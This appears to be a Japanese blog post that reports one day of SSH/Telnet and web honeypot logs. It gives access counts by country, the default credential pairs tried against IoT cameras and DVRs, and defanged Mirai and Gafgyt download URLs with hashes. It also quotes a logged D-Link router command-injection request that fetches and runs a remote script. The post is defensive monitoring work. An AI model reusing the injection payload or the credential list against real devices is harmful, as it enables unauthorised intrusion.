ハニーポット観察日記(2019/01/12) 「イタリアからのアクセス件数が大幅に減少」
はじめに
こんにちは。cute_otterです。
この三連休中にWOWHoneypotのログビュワーの機能を拡充したいなぁ
Cowrie
ハニーポット「Cowrie」で2019/01/12 (土) 00:00~23:59 UTC(運用60日目)に取得したログの簡易分析です。
概況
本日より新たにスキャンと思われるセッション
の項目を追加しました。
- 集計期間 : 2019/01/12 (土) 00:00~23:59 UTC
- 総イベント件数 : 609,055 件 (前日比 -82,787 件)
- コマンド実行成功 : 251,800 件 (前日比 -47,651 件)
- コマンド入力 : 208,353 件 (前日比 -27,028 件)
- ファイルダウンロード成功 : 38,184 件 (前日比 -7,594 件)
- 新しいコネクション : 28,521 件 (前日比 +494 件)
- セッションクローズ : 28,505 件 (前日比 +504 件)
- コマンド実行失敗 : 12,611 件 (前日比 -236 件)
- ログイン成功 : 8,883 件 (前日比 -357 件)
- 外部へのTCP/IPリクエストの送出 : 7,175 件 (前日比 -696 件)
- Cowrieによってエミュレートされたアーキテクチャ : 5,775 件 (前日比 -295 件)
- TTYログ取得終了 : 5,761 件 (前日比 -295 件)
- ファイルダウンロード失敗 : 4,264 件 (前日比 -840 件)
- クライアントのSSHバージョン : 3,505 件 (前日比 +34 件)
- SSH鍵交換 : 3,497 件 (前日比 +29 件)
- ログイン失敗 : 1,608 件 (前日比 +1,356 件)
- 外部へのTCP/IPデータの送出 : 609 件 (前日比 -200 件)
- ターミナルサイズ : 4 件 (前日比 -4 件)
- ログイン試行 : 10,491 件 (前日比 +999 件)
- SSHコネクション : 12,118 件 (前日比 +385 件)
- Telnetコネクション : 16,403 件 (前日比 +109 件)
- ユニークIPアドレス : 397 件 (前日比 -11 件)
- アクセス元の国 : 57 カ国 (前日比 -7 カ国)
- TTY : 5,761 件 (前日比 -295 件)
- スキャンと思われるセッション : 17,431 件 (前日比 +848 件)
特徴
- 総イベント件数が減少しました。
- 前日より8万3,000件ほど減少しました。
- ログイン試行件数が増加しました。
- 前日より1,000件ほど増加しました。
- スキャンと思われるセッションの件数が増加しました。
- 前日より850件ほど増加しました。
- イタリアからのアクセス件数が大幅に減少しました。
- 前日より17万6,000件ほど減少しました。
ダッシュボード
ダッシュボードは以下の通りです。
国別のアクセス件数
国別のアクセス件数の変遷は以下の通りです。
続いて、国別のアクセス件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | United States | 461,440 | 1. | 373,447 | +87,993 | - |
2. | Italy | 100,946 | 2. | 276,857 | -175,911 | - |
3. | United Kingdom | 16,172 | 3. | 15,649 | +523 | - |
4. | Ireland | 8,734 | 4. | 8,751 | -17 | - |
5. | Unknown | 5,754 | 5. | 5,496 | +258 | - |
6. | Singapore | 3,590 | 6. | 4,348 | -758 | - |
7. | Germany | 3,291 | 25. | 63 | +3,228 | - |
8. | India | 2,575 | 19. | 144 | +2,431 | - |
9. | Russia | 1,400 | 7. | 1,682 | -282 | - |
10. | Latvia | 1,211 | 13. | 282 | +929 | - |
11. | China | 521 | 8. | 960 | -439 | - |
12. | Vietnam | 503 | 12. | 399 | +104 | - |
13. | Romania | 476 | 17. | 186 | +290 | - |
14. | Republic of Korea | 410 | 20. | 140 | +270 | - |
15. | Canada | 333 | 10. | 537 | -204 | - |
16. | Sweden | 271 | 14. | 276 | -5 | - |
17. | Colombia | 203 | 30. | 24 | +179 | - |
18. | France | 185 | 9. | 557 | -372 | - |
19. | Bulgaria | 178 | - | 0 | +178 | - |
20. | Brazil | 125 | 18. | 185 | -60 | - |
- 3日連続で全体的にアクセス件数が減少しました。本日は特に
イタリア
からのアクセス件数が減少しました。 イタリア
からのアクセス件数が前日より17万6,000件ほど減少しました。- 0~2時にアクセスが集中していました。
アメリカ
からのアクセス件数が前日より8万8,000件ほど増加しました。ドイツ
からのアクセス件数が前日より3,200件ほど増加しました。インド
からのアクセス件数が前日より2,400件ほど増加しました。- インドからのアクセスのうち約90%が12時に集中していました。
イタリアからのアクセス件数の変遷
イタリアからのアクセス件数の変遷(2018/12/24~2019/01/12)は以下の通りです。
2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が6万件台まで減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけて、連日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05は8万件ほど減少しましたが、2019/01/06には525,601件となり、過去最大となりました。
2019/01/07~08にかけて件数が減少しましたが、2019/01/09~10にかけて30万件以上のアクセスがありました。
2019/01/11以降、件数が減少しています。
国別のログイン試行
国別のログイン試行の件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | United States | 4,381 | 1. | 3,315 | +1,066 | - |
2. | United Kingdom | 1,720 | 3. | 1,798 | -78 | - |
3. | India | 1,401 | 12. | 18 | +1,383 | - |
4. | Ireland | 1,295 | 4. | 1,240 | +55 | - |
5. | Italy | 932 | 2. | 2,530 | -1,598 | - |
6. | Russia | 157 | 5. | 161 | -4 | - |
7. | Germany | 141 | 14. | 11 | +130 | - |
8. | Singapore | 85 | 6. | 99 | -14 | - |
9. | China | 65 | 7. | 92 | -27 | - |
10. | Republic of Korea | 38 | 19. | 6 | +32 | - |
11. | Canada | 33 | 13. | 17 | +16 | - |
12. | Vietnam | 31 | 8. | 28 | +3 | - |
13. | Latvia | 26 | 18. | 6 | +20 | - |
14. | Sweden | 26 | 10. | 23 | +3 | - |
15. | France | 25 | 9. | 23 | +2 | - |
16. | Bulgaria | 20 | - | |||
17. | Indonesia | 12 | 36. | 2 | +10 | - |
18. | Brazil | 12 | 11. | 18 | -6 | - |
19. | Romania | 12 | 20. | 6 | +6 | - |
20. | Colombia | 7 | 27. | 3 | +4 | - |
アメリカ
からのログイン試行件数が前日より1,100件ほど増加しました。インド
からのログイン試行件数が前日より1,400件ほど増加しました。イタリア
からのログイン試行件数が前日より1,600件ほど減少しました。
ログイン試行で使用されたユーザ名とパスワード
ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。
順位 | ユーザ名 | パスワード | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|---|
1. | admin | admin | 3,175 | 1. | 3,207 | -32 | - |
2. | root | 88888888 | 462 | 2. | 882 | -420 | DVRを狙ったものと思われる(参照) |
3. | enable | system | 460 | 34. | 18 | +442 | - |
4. | shell | sh | 456 | 38. | 16 | +440 | - |
5. | root | (空欄) | 307 | 8. | 199 | +108 | - |
6. | root | vizxv | 262 | 9. | 193 | +69 | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
7. | root | 666666 | 253 | 7. | 214 | +39 | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
8. | guest | 123456 | 238 | 4. | 440 | -202 | - |
9. | root | GM8182 | 236 | 3. | 441 | -205 | Grain Media製のDVRを狙ったものと思われる(参照) |
10. | admin | admin1 | 230 | 6. | 433 | -203 | - |
11. | support | 1234 | 227 | 5. | 438 | -211 | - |
12. | user | user | 208 | 11. | 169 | +39 | - |
13. | root | pass | 201 | 10. | 171 | +30 | Axis製のIPカメラを狙ったものと思われる(参照) |
14. | root | 123456 | 180 | 19. | 114 | +66 | - |
15. | root | 888888 | 179 | 15. | 139 | +40 | Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照) |
16. | root | system | 174 | 13. | 147 | +27 | IQinVision製のIPカメラを狙ったものと思われる(参照) |
17. | support | support | 168 | 14. | 143 | +25 | - |
18. | root | xc3511 | 163 | 16. | 139 | +24 | HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照) |
19. | root | 1234 | 153 | 12. | 157 | -4 | - |
20. | admin | 4321 | 144 | 18. | 137 | +7 | - |
admin/admin
の組み合わせのほとんどがイギリス
とアイルランド
からのログイン試行の際に使用されていました。イギリス
が1,656件(3,175件中)、アイルランド
が1,290件(3,175件中)でした。
root/88888888
、root/GM8182
、guest/123456
、support/1234
、admin/admin1
の組み合わせのほとんどがイタリア
からのログイン試行の際に使用されていました。root/88888888
は306件(462件中)でした。guest/123456
は151件(238件中)でした。root/GM8182
は155件(236件中)でした。admin/admin1
は153件(230件中)でした。support/1234
は149件(227件中)でした。
ダウンロードされたファイル
ダウンロードされたファイルは以下の通りです。
※VT : VirusTotal
順位 | ダウンロード元 | MD5 | 検出率(VT) | 件数 | 備考 |
---|---|---|---|---|---|
1. | hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 | 4147e375f325878fe3c3962c3d4ac411 | 37/57 | 2,779 | Mirai |
2. | hxxp://195[.]231[.]0[.]120:80/AB4g5/Josho[.]x86 | d5f9953e5209ebe670208ff55155fa6e | 20/59 | 897 | Mirai |
3. | hxxp://209[.]141[.]43[.]15:80/bins/mirai[.]x86 | 256e4d3c013fe49c6166da2d3ba0c524 | 20/58 | 266 | Mirai |
4. | hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 | 0f6fa2e22d9de3864e7d60ed6c0cb4b5 | 33/57 | 77 | Gafgyt| or Mirai |
5. | hxxp://159[.]65[.]190[.]9:80/Binarys/Owari[.]x86 | e01733ef09a20256ada587920dc8de5f | 24/59 | 45 | Mirai |
6. | hxxp://185[.]244[.]25[.]233/8UsA[.]sh | 9a75838c7c303d7946dda48f41c72717 | 25/58 | 38 | Mirai(ダウンローダー) |
7. | hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86 | 3906a2f9b3192664762e3f6eb84f4c18 | 27/58 | 30 | Mirai |
8. | hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 | e68bd8a8712ce1788faa15c9813c00ab | 20/57 | 25 | Mirai |
9. | hxxp://207[.]154[.]193[.]227:80/bins/Damien[.]x86 | 2db43f53e5c60b2fc54ff18904688261 | 14/60 | 15 | Mirai |
10. | hxxp://207[.]154[.]193[.]227:80/bins/Damien[.]x86 | afb4b7d8bd56974d5fcdd0979bc00a96 | 12/60 | 13 | Mirai |
11. | hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 | e4ae3f23bbdbcb67b52be4616ffe280b | 21/57 | 10 | Mirai |
12. | hxxp://207[.]154[.]193[.]227:80/bins/Damien[.]x86 | b0f07d4686797d3fd775ce9c5f94bc16 | 15/58 | 10 | Mirai |
13. | hxxp://185[.]172[.]110[.]213/bins[.]sh | c3d5df1e99c83f3c5fa42371e2091121 | 24/59 | 7 | Mirai|(ダウンローダー) |
14. | hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 | f81cb52b13c0ad74247db720ffe5fa36 | 23/57 | 7 | Mirai |
15. | hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido | 236cc078eb84e9e14f1112a52e74abc9 | 35/60 | 7 | Mirai |
16. | hxxp://149[.]248[.]56[.]218:80/OwO/Tsunami[.]x86 | 23425d830ec98cc0322e91bc5935ac81 | 22/57 | 6 | Mirai |
17. | hxxp://104[.]248[.]114[.]222:80/bins/penthouse[.]x86 | c0bdcfb11515c1de5e3be7c0a417fb05 | 22/60 | 4 | Mirai |
18. | hxxp://80[.]211[.]101[.]178:80/8x868 | 6f6a163f1193fc9b651b3f3203c9c01a | 7/58 | 3 | Gafgyt |
19. | hxxp://35[.]235[.]102[.]123:80/bins/telnet[.]x86 | 12747042919cf473e147c0201773bed9 | 22/58 | 3 | Mirai |
20. | hxxp://80[.]211[.]101[.]178/8UsA[.]sh | e01e83c7ba252b8acef21dafe14f5b37 | 24/59 | 2 | Mirai(ダウンローダー) |
21. | hxxp://195[.]231[.]6[.]19:80/bins/hoho[.]x86 | 711b2f048b149bd350aea7cefccba74e | 20/60 | 2 | Mirai |
22. | hxxp://185[.]141[.]24[.]211:80/bins/x86 | 10dca4ac870088e4fc710d9639fc888e | 17/58 | 1 | Mirai |
23. | hxxp://80[.]211[.]101[.]178:80/bins/hoho[.]x86 | b9a2ac621ca6ab08f00550825be4c64c | 21/59 | 1 | Mirai |
- Mirai(亜種含む)やGafgyt(亜種含む)と思われるファイルがダウンロードされていました。
IRCボット
前日まで5日連続してRaspberry Piを狙ったと思われるIRCボットを観測していましたが、本日は観測されませんでした。
Cowrieで取得したログの簡易分析は以上です。
WOWHoneypot
続いて、ハニーポット「WOWHoneypot」で2019/01/12 (土) 00:00~23:59 UTC(運用9日目)に取得したログの簡易分析です。
2019/01/11のWOWHoneypotのログの取得ができなかったので、前日比は記載していません。
概況
- 集計期間 : 2019/01/12 (土) 00:00~23:59 UTC
- 総アクセス件数 : 13 件 (前日比 - 件)
- ユニークIPアドレス件数 : 12 件 (前日比 - 件)
- アクセス元の国数 : 10 カ国 (前日比 - 件)
特徴
- 過去最低のアクセス件数でした。
- 普段アクセス件数が数百件ある
中国
からのアクセスが1件しかありませんでした。
国別のアクセス件数
国別のアクセス件数(上位5位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Brazil | 3 | - | - | - | - |
2. | Greece | 2 | - | - | - | - |
3. | Indonesia | 1 | - | - | - | - |
4. | Italy | 1 | - | - | - | - |
5. | United Kingdom | 1 | - | - | - | - |
- 一昨日までは
中国
からのアクセスが数百件ありましたが、本日は1件だけ観測しました。
メソッド
メソッドの件数は以下の通りです。
順位 | メソッド | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | GET | 13 | - | - | - | - |
HTTPバージョン
HTTPバージョンの件数は以下の通りです。
順位 | HTTPバージョン | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | HTTP/1.1 | 12 | - | - | - | - |
2. | HTTP/1.0 | 1 | - | - | - | - |
アクセス先
アクセス先は以下の通りです。
順位 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | GET / HTTP/1.1 | 9 | - | - | - | トップページへのアクセス |
2. | GET /mysql/admin/index.php?lang=en HTTP/1.1 | 2 | - | - | - | phpMyAdminの探査 |
3. | GET / HTTP/1.0 | 1 | - | - | - | トップページへのアクセス |
4. | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1 | 1 | - | - | - | D-Link製のルーターの脆弱性(OSコマンドインジェクション)を狙った攻撃と思われる。User-AgentはHakai/2.0 でした。 |
- 6日ぶりにD-Link製のルーターを狙った攻撃を観測しました。
WOWHoneypotで取得したログの簡易分析は以上です。